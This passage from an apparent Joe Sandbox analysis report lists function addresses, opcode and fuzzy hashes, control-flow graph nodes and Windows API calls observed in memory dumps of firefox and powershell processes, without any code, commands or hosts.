                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000003.1914337956.0000031783A41000.00000020.00000800.00020000.00000000.sdmp, Offset: 0000031783A41000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_3_31783a41000_firefox.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6405b504b135200ba4b164ff0f1bc765506cc7b63fcd2f37b80c4342f9af7585
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 88e7ad7a7886bef541031b933af48f4b925625ae2839e37d73a3b12678967082
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6405b504b135200ba4b164ff0f1bc765506cc7b63fcd2f37b80c4342f9af7585
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74012632C0CF850AF713AA2CD856FD4B7A4E719304F2A0249E82C8B1C3C522CF819253
                                                                                                                                                                                                                                                                                                                                                        Function 0000031783A47BB6 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000003.1914337956.0000031783A41000.00000020.00000800.00020000.00000000.sdmp, Offset: 0000031783A41000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_3_31783a41000_firefox.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5fd64ef4a4e23a7d672380d452291e37cd439b3b5a4dca81f864897199d8f37c
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7efc8c401dd6f9e465fbff8f888d8590bbf259b500983cddb5d1ec7a12284381
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5fd64ef4a4e23a7d672380d452291e37cd439b3b5a4dca81f864897199d8f37c
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F014B31608A1C9FCF59EF58D8C5E987BF1FF2D310B040289EA09DB262C631E9908B61
                                                                                                                                                                                                                                                                                                                                                        Function 0000031783A47491 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000003.1914337956.0000031783A41000.00000020.00000800.00020000.00000000.sdmp, Offset: 0000031783A41000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_3_31783a41000_firefox.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 56c22f8b0f465ffda855f472f6c0967fab70a2a757aad2e4c890799ee4e48ea2
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 53c361c69e32402b037ae5b235c62f50441e681df8f5dd10f115a14a07898e18
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 56c22f8b0f465ffda855f472f6c0967fab70a2a757aad2e4c890799ee4e48ea2
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5501F731C0CE850AF752AA2CD85BBA4B769E718304F290249A46D8B1C3C563CF559253

                                                                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                                                                        Execution Coverage:0.3%
                                                                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                        Signature Coverage:100%
                                                                                                                                                                                                                                                                                                                                                        Total number of Nodes:6
                                                                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                                                                                                        execution_graph 5003 27126404f32 5004 27126404f89 NtQuerySystemInformation 5003->5004 5005 27126403304 5003->5005 5004->5005 5000 271256f2377 5001 271256f2387 NtQuerySystemInformation 5000->5001 5002 271256f2324 5001->5002

                                                                                                                                                                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                                                                                        Function 0000027126404F32 Relevance: 26.1, APIs: 1, Strings: 10, Instructions: 6826nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.2666874089.0000027126402000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000027126402000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_27126402000_firefox.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: InformationQuerySystem
                                                                                                                                                                                                                                                                                                                                                        • String ID: #$#$#$4$>$>$>$A$z$z
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3562636166-3072146587
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: a7beeb6ed6d4bd1c13836e24e4a4bf8602c8d7752103ee20adf8d6ea9f6b849f
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1a35843b9c55b11218704acbf7efb97d47a79ff01859997860c8a19288cf302e
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7beeb6ed6d4bd1c13836e24e4a4bf8602c8d7752103ee20adf8d6ea9f6b849f
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1DA3C431618A698BDB2DDF1CDC856A977E5FB94300F14422EDC8BC7296DE34E9128BC1
                                                                                                                                                                                                                                                                                                                                                        Function 00000271256F2377 Relevance: 8.4, APIs: 1, Instructions: 6852nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.2639544456.00000271256F0000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000271256F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_271256f0000_firefox.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: InformationQuerySystem
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3562636166-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: a3d4a310f25344abd1978f5247c9d082b9ccbb3eaa73dfa71153365510a96fee
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f4981385c6830a5460509c19d40a3bbad991798f5149cc71634614c0cc61c01e
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3d4a310f25344abd1978f5247c9d082b9ccbb3eaa73dfa71153365510a96fee
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26A3F531A18A688BDB2DDF2CDC957A973E5FB55300F44426EDC4BC3242DF34EA528A85
                                                                                                                                                                                                                                                                                                                                                        Function 0000027126404F72 Relevance: 4.6, Strings: 3, Instructions: 887COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.2666874089.0000027126402000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000027126402000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_27126402000_firefox.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: #$4$z
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-222932584
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3f12bc94a441b99678d1f37fd838eb33403ab1c1100704a4327215b314ffab7c
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: cd63abada4f3d709571ac8c75680708544321d50dd885f40778a617aabe0d95f
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f12bc94a441b99678d1f37fd838eb33403ab1c1100704a4327215b314ffab7c
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA527231618E5D8BEB2ADF28DC896E973E5FF54301F04422AD88AC2156DF34EA558BC1
                                                                                                                                                                                                                                                                                                                                                        Function 00000271256FE100 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 2850 271256fe100-271256fe143 2851 271256fe147-271256fe149 2850->2851 2852 271256fe14b-271256fe182 2851->2852 2853 271256fe19f-271256fe1d1 2851->2853 2852->2853
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.2639544456.00000271256FE000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000271256FE000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_271256fe000_firefox.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b6a6b088691ec5e3693f8b0833c75b37cadbcab5ecc159d08a31904e442e292e
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: a338b1e0f8f143f0995d3271043b32dec960ef1b3f797ff23092bc7762120337
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6a6b088691ec5e3693f8b0833c75b37cadbcab5ecc159d08a31904e442e292e
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2521A23150CB8C4FD786DF28C844A56BBE0FB9A310F1506AFE08AC3292DA34D9498782

                                                                                                                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                        Function 000002712640565C Relevance: .4, Instructions: 417COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.2666874089.0000027126402000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000027126402000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_27126402000_firefox.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2fa4645b680d34bee22a3500d205d04f87224c646c510b3238a6d81739ab6236
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: a9d5a9dde5c5e46897d453439942e54b96e41ef750b2156ac2f8931e1bd95bd1
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fa4645b680d34bee22a3500d205d04f87224c646c510b3238a6d81739ab6236
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7BB1D431B5C2900B871CC92D586707AF7D7E7CA60AB24E23EE9CBC7189DD3448539AC6

                                                                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                                                                        Execution Coverage:4.6%
                                                                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                        Total number of Nodes:14
                                                                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:1
                                                                                                                                                                                                                                                                                                                                                        execution_graph 6465 7ffeb319829a 6466 7ffeb31982d1 GetFileAttributesW 6465->6466 6468 7ffeb3198336 6466->6468 6469 7ffeb3198ada 6470 7ffeb31a6e00 ComputeAccessTokenFromCodeAuthzLevel 6469->6470 6472 7ffeb31a6eae 6470->6472 6473 7ffeb319365c 6474 7ffeb3193665 6473->6474 6477 7ffeb3192d88 6474->6477 6476 7ffeb31936e3 6478 7ffeb3192d8d 6477->6478 6479 7ffeb31a9293 GetSystemInfo 6478->6479 6481 7ffeb31a9200 6478->6481 6480 7ffeb31a92ce 6479->6480 6480->6476 6481->6476

                                                                                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB3192C90 Relevance: 1.7, APIs: 1, Instructions: 235COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2858544880.00007FFEB3190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3190000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb3190000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: dfe468d399a18aeaf84de79bc4e78bbb60772294c2b198fd6af22446e3b313cd
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 9b3e9078b50977ab6ff78790b40fe6439ee46862040812d2fabe9b24a68b8743
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dfe468d399a18aeaf84de79bc4e78bbb60772294c2b198fd6af22446e3b313cd
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C71233290CA4D4FE754DB68C8566F97BE1EF6A325F04027BD04DD31E2DA2864468B81
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB3198ADA Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 147 7ffeb3198ada-7ffeb31a6eac ComputeAccessTokenFromCodeAuthzLevel 151 7ffeb31a6eae 147->151 152 7ffeb31a6eb4-7ffeb31a6ee3 147->152 151->152
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2858544880.00007FFEB3190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3190000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb3190000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 132034935-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f08234b4390326cdba54c4c24e1bd9c9909daab47019ab5f24c8f970357515b4
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3f6a814aca7a85a126c2d6acf507ab45eaa15d3d0ee7b6a56f3d72fa311c9041
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f08234b4390326cdba54c4c24e1bd9c9909daab47019ab5f24c8f970357515b4
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C318331918A1C9FDB18DB9CD84A6B977E1FB69321F00422FD049D3651CB74A8568BD1
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB31971F2 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 154 7ffeb31971f2-7ffeb31982f8 158 7ffeb31982fa-7ffeb31982ff 154->158 159 7ffeb3198302-7ffeb3198334 GetFileAttributesW 154->159 158->159 160 7ffeb3198336 159->160 161 7ffeb319833c-7ffeb3198361 159->161 160->161
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2858544880.00007FFEB3190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3190000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb3190000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8ba659f6d5219fca0b4326dbb06682005b1c0953d0f373ba02a6e42c38046967
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 80ce5cb9587fd14c503e7970c73fe3f79e6a071cd0c1711dec00b5864e697f78
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ba659f6d5219fca0b4326dbb06682005b1c0953d0f373ba02a6e42c38046967
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6216171908A1C9FDB58DB98D849AF9BBE1FF69321F00822FD00DD3651DB74A8168B91
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB319829A Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 163 7ffeb319829a-7ffeb31982f8 166 7ffeb31982fa-7ffeb31982ff 163->166 167 7ffeb3198302-7ffeb3198334 GetFileAttributesW 163->167 166->167 168 7ffeb3198336 167->168 169 7ffeb319833c-7ffeb3198361 167->169 168->169
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2858544880.00007FFEB3190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3190000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb3190000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ccbc7dc393ccf69e6aa536c036e099d93b1797d48e84d8d298e3175c997b06a0
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0c13c85bf3800b8e934169304353af369920d2b4d81c21eef5a586f18ece0c9d
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ccbc7dc393ccf69e6aa536c036e099d93b1797d48e84d8d298e3175c997b06a0
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE217E71908A1C8FDB58DF9CD849AE9BBE1FF69321F00822FD009D3651DB74A816CB81
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB3198289 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 171 7ffeb3198289-7ffeb319828f 172 7ffeb31982d1-7ffeb31982f8 171->172 173 7ffeb3198291-7ffeb3198297 171->173 175 7ffeb31982fa-7ffeb31982ff 172->175 176 7ffeb3198302-7ffeb3198334 GetFileAttributesW 172->176 173->172 175->176 177 7ffeb3198336 176->177 178 7ffeb319833c-7ffeb3198361 176->178 177->178
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2858544880.00007FFEB3190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3190000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb3190000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: a90f1d66119980a6c11c0d88108ce12d457c949fdd3d893be3119afa166c25e7
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 96b3b0d329a5b804369c540691b81a0a6797e7df79eba9d6c2ccae0c3c9e063f
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a90f1d66119980a6c11c0d88108ce12d457c949fdd3d893be3119afa166c25e7
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 56219F31908A4C8FDB49DB98D4457E8BBF1FF29320F04826BC00DE3662CB74A846CB81
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB3900456 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2904973031.00007FFEB3900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3900000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb3900000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2e806121a8f826555604fe17e907e6c9be603458a9f7bdcd308f87ed4aae2e47
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c32dd80ebf4a196d96201c9761e9c77a77dda383c40ad5cc90e1b540358efb08
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e806121a8f826555604fe17e907e6c9be603458a9f7bdcd308f87ed4aae2e47
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28412C3160DB590FE755D75CA4125BAFBD1EFD6220F0006BFE5C9C32B2CA69A8468782
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB37A664C Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 320 7ffeb37a664c-7ffeb37a6653 321 7ffeb37a665e-7ffeb37a66ed 320->321 322 7ffeb37a6655-7ffeb37a665d 320->322 326 7ffeb37a66f7-7ffeb37a672e 321->326 327 7ffeb37a66ef-7ffeb37a66f4 321->327 322->321 328 7ffeb37a6735-7ffeb37a6742 326->328 327->326 329 7ffeb37a674a-7ffeb37a6769 328->329 330 7ffeb37a6744 328->330 330->329
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2895942618.00007FFEB37A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB37A0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb37a0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 16da3afea83f46a6c0f5b1bcd34d7a16954f312f5c76354436db81f7bf859f0a
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8682b728fe00b56c97a2a764448dc24c81edc7536a1049ce802f9c6aeab2d609
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16da3afea83f46a6c0f5b1bcd34d7a16954f312f5c76354436db81f7bf859f0a
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F41C43191CB5C8FDB59DF5CD84A6E9BBE0FBA9321F04426FE049D3252CA706845CB92
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB3491E28 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2875850125.00007FFEB3490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3490000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb3490000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: dd7baaacbabcfb3ef4f0cad68fbbee504a46b678915ef33effdc4083534ed813
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0be8a82a8c42b0a8281ca89108b827be61598415a953d8649811ec71f880f8e2
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd7baaacbabcfb3ef4f0cad68fbbee504a46b678915ef33effdc4083534ed813
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37214256C4E6C60FEB77476818261A06FA29F77220B4D03FBD588DA5F3E90D29458321
                                                                                                                                                                                                                                                                                                                                                        Function 00007FFEB37A6C6B Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2895942618.00007FFEB37A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB37A0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb37a0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
